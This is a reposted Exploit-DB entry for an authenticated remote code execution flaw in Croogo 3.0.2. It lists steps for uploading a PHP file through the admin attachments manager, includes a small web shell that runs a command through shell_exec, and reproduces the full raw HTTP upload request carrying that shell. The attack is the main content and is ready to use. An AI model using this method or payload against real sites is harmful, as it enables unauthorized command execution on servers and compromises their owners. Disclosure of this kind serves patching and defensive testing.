Croogo 3.0.2 – Remote Code Execution (Authenticated)

  • 作者: Deha Berkin Bir
    日期: 2021-12-06
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/50570/
  • # Exploit Title: Croogo 3.0.2 - Remote Code Execution (Authenticated)
    # Date: 05/12/2021
    # Exploit Author: Deha Berkin Bir
    # Vendor Homepage: https://croogo.org/
    # Software Link: https://downloads.croogo.org/v3.0.2.zip
    # Version: 3.0.2
    # Tested on: Windows 10 Home Single Language 20H2 & WampServer 3.2.3
    
    ==> Tutorial <==
    
    1- Login with your privileged account.
    2- Go to the 'Attachments' section. Directory is '/admin/file-manager/attachments'.
    3- Click the 'New Attachment' button.
    4- Choose a malicious php script and upload it.
    
    ########### EXAMPLE SOURCE CODE OF MALICIOUS PHP SCRIPT ####################
    <?php
    $command = shell_exec('netstat -an');
    echo "<pre>$command</pre>";
    ?>
    ############################################################################
    
    5- Click on the URL of malicious php script you uploaded.
    6- The malicious PHP script will be executed.
    
    
    ==> HTTP Request (File Upload) <==
    
    POST /admin/file-manager/attachments/add HTTP/1.1
    Host: (HOST)
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
    Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
    Accept-Encoding: gzip, deflate
    Content-Type: multipart/form-data; boundary=---------------------------7028631106888453201670373694
    Content-Length: 976
    Origin: http://(HOST)
    Connection: close
    Referer: http://(HOST)/admin/file-manager/attachments/add
    Cookie: csrfToken=bf693e75da3b8cfedb1e097485ecb0fa89d92fcc3d67afd0601bad6c304a2793582ecb; CAKEPHP=do6gfdgwsl424dabvg1mqp9; GeniXCMS-pJSRyfdghoBRVTDlKhjklmkfhtkbup1r; PHPSESSID=gd59dfghhhg2n10amijq89hih
    Upgrade-Insecure-Requests: 1
    Sec-Fetch-Dest: document
    Sec-Fetch-Mode: navigate
    Sec-Fetch-Site: same-origin
    Sec-Fetch-User: ?1
    
    -----------------------------7028631106888453201670373694
    Content-Disposition: form-data; name="_method"
    
    POST
    -----------------------------7028631106888453201670373694
    Content-Disposition: form-data; name="_csrfToken"
    
    bf693ebed78cee03265197aed57e994e70d7qwdfq231341234dsfasdf2397485ecb0fa89d92fcc3d67afd0601bad6c304a2793582ecb
    -----------------------------7028631106888453201670373694
    Content-Disposition: form-data; name="file"; filename="malicious.php"
    Content-Type: application/octet-stream
    
    <?php
    $command = shell_exec('netstat -an');
    echo "<pre>$command</pre>";
    ?>
    
    -----------------------------7028631106888453201670373694
    Content-Disposition: form-data; name="_Token[fields]"
    
    16ade00fae1eb7183f11fe75ed658ae4ec2a5921%3A
    -----------------------------7028631106888453201670373694
    Content-Disposition: form-data; name="_Token[unlocked]"
    
    
    -----------------------------7028631106888453201670373694--